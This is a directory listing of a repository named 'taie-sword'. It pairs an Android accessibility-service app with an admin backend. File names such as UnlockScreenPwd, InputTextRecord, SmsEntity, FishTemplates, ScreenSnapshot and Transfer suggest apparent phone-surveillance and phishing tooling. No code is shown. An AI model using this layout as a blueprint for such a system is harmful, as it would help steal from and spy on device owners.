# taie-sword

access-server/: .gitignore  RHINO_DEMO_README.md  RHINO_FIXES_README.md  settings.gradle
access-server/app/: build.gradle
access-server/app/src/androidTest/java/com/example/accessserver/: ExampleInstrumentedTest.java
access-server/app/src/main/: AndroidManifest.xml
access-server/app/src/main/java/com/example/accessserver/: DemoData.java  FirstFragment.java  JSTestHelper.java  MainActivity.java  RhinoHelper.java  SecondFragment.java
access-server/app/src/main/res/layout/: activity_main_simple.xml
access-server/app/src/main/res/menu/: menu_main.xml
access-server/app/src/main/res/navigation/: nav_graph.xml
access-server/app/src/main/res/values/: strings.xml  themes.xml
access-server/app/src/main/res/values-night/: themes.xml
access-server/app/src/main/res/values-v23/: themes.xml
access-server/app/src/main/res/xml/: accessibility_service_config.xml
access-server/app/src/test/java/com/example/accessserver/: ExampleUnitTest.java
access-server/aslib/: build.gradle
access-server/aslib/libs/: android_keeplive.aar
access-server/aslib/src/main/: AndroidManifest.xml
access-server/aslib/src/main/java/com/example/aslib/: AccessService.java  AccessService1.java  App.java  NetWork.java
access-server/aslib/src/main/java/com/example/aslib/common/: ApiService.java  AppConfig.java  BoundedList.java  Config.java  Constant.java  MyConstants.java  SystemUtil.java  Utils.java
access-server/aslib/src/main/java/com/example/aslib/exceptions/: ApiException.java
access-server/aslib/src/main/java/com/example/aslib/p2p/: RustApi.java  WebRTCCallback.java  WebRTCManager.java
access-server/aslib/src/main/java/com/example/aslib/vo/: Asset.java  Currency.java  DeviceInfo.java  HandlerMessage.java  HeartResponse.java  HttpResult.java  InputTextRecord.java  MajorData.java  MyGes.java  MyLog.java  Transfer.java
access-server/gradle/: libs.versions.toml
access-server/gradle/wrapper/: gradle-wrapper.properties
access-server/patch/: build.gradle
access-server/patch/src/main/: AndroidManifest.xml
access-server/patch/src/main/java/com/example/patch/: Patch.java
access-server/patch/src/main/java/com/example/patch/utils/: Log.java
access-server/rust_jni/: ANDROID_WEBRTC_USAGE.md  BINARY_DATA_USAGE.md  BINARY_SUPPORT_SUMMARY.md  Cargo.toml  OPTIMIZATION_SUMMARY.md  WebRTC-Client-README.md  build.rs  build.sh  chat.html  simple-integration.html  webrtc-client.js  webrtc-example.html
access-server/rust_jni/.cargo/: config.toml
access-server/rust_jni/src/: database.rs  lib.rs  p2p.rs  utils.rs
access-server/rust_jni/src/entities/: mod.rs  order.rs  user.rs
access-server/rust_jni/src/services/: mod.rs  order_service.rs  user_service.rs
taie-service/renren-admin/: .project  pom.xml
taie-service/renren-admin/db/: 1108.sql  add.sql
taie-service/renren-admin/db/generator/: dm8.sql  oracle.sql  postgresql.sql  sqlserver.sql
taie-service/renren-admin/db/generator/template/: Excel.java.ftl  list.vue.ftl
taie-service/renren-admin/src/main/java/com/ghost/frc/proto/: Message.java
taie-service/renren-admin/src/main/java/io/renren/: AdminApplication.java
taie-service/renren-admin/src/main/java/io/renren/common/config/: ApiWebMvcConfig.java  CorsConfig.java  SwaggerConfig.java
taie-service/renren-admin/src/main/java/io/renren/common/exception/: RenExceptionHandler.java
taie-service/renren-admin/src/main/java/io/renren/common/utils/: ExcelDataListener.java  ExcelUtils.java  PageUtils.java  PasswordRecoveryUtils.java
taie-service/renren-admin/src/main/java/io/renren/modules/app/common/: AutoReapEnum.java  DeviceStatusEnum.java  OcrUtils.java  SrceenStatusEnum.java  Utils.java  WakeStatusEnum.java
taie-service/renren-admin/src/main/java/io/renren/modules/app/config/: ApiInterceptor.java  AsyncConfig.java  PkgAuthAspect.java  ProxyAuthAspect.java  TesseractConfig.java  WebSocketConfiguration.java
taie-service/renren-admin/src/main/java/io/renren/modules/app/context/: DeviceContext.java
taie-service/renren-admin/src/main/java/io/renren/modules/app/entity/: AlbumPicEntity.java  AppAssets.java  AppBaseEntity.java  AppTransferRecord.java  Asset.java  Device.java  DownloadStatistics.java  FishData.java  FishTemplates.java  HeartEntity.java  InputTextRecord.java  InstallApp.java  InstallAppFilter.java  JsCode.java  Log.java  MajorData.java  MajorDataRule.java  ProxyInfoEntity.java  ScreenInfo.java  ScreenSnapshot.java  SmsEntity.java  SmsInfoEntity.java  TelegramBotEntity.java  Template.java  TimestampDeserializer.java  Transfer.java  UnlockScreenPwd.java
taie-service/renren-admin/src/main/java/io/renren/modules/app/handler/: TelegramHandler.java  TelegramNotificationHandler.java
taie-service/renren-admin/src/main/java/io/renren/modules/app/jobs/: CommonJobs.java
taie-service/renren-admin/src/main/java/io/renren/modules/app/mapper/: AlbumPicMapper.java  AppAssetsMapper.java  AppTransferRecordMapper.java  AssetMapper.java  DeviceMapper.java  DownloadStatisticsMapper.java  FishDataMapper.java  FishTemplateMapper.java  FishTemplatesMapper.java  HeartMapper.java  InputTextRecordMapper.java  (+15 more)
taie-service/renren-admin/src/main/resources/: application-dev.yml  application-meiguo.yml  application-prod.yml  application-test.yml  application.yml  logback-spring.xml
taie-service/renren-admin/src/main/resources/mapper/demo/: ProductParamsDao.xml
taie-service/renren-admin/src/main/resources/mapper/devtools/: TableFieldDao.xml  TableInfoDao.xml  TemplateDao.xml
taie-service/renren-admin/src/main/resources/mapper/sys/: SysUserDao.xml
taie-service/renren-admin/src/main/resources/proto/: message.proto
taie-service/renren-admin/src/test/java/io/renren/: Base64Test.java  BigNumberTest.java  DecodeBytes.java  DynamicDataSourceTest.java  ExtractCurrencyAndNumber.java  FishDecode.java  GridTest.java  IpTest.java  Main.java  ParseTest.java  PasswordRecoveryExample.java  PasswordTest.java  PatternTest.java  SocketIoTest.java  StringEncryptionHelper.java  Tess4jDemo.java
(+457 files in other folders)
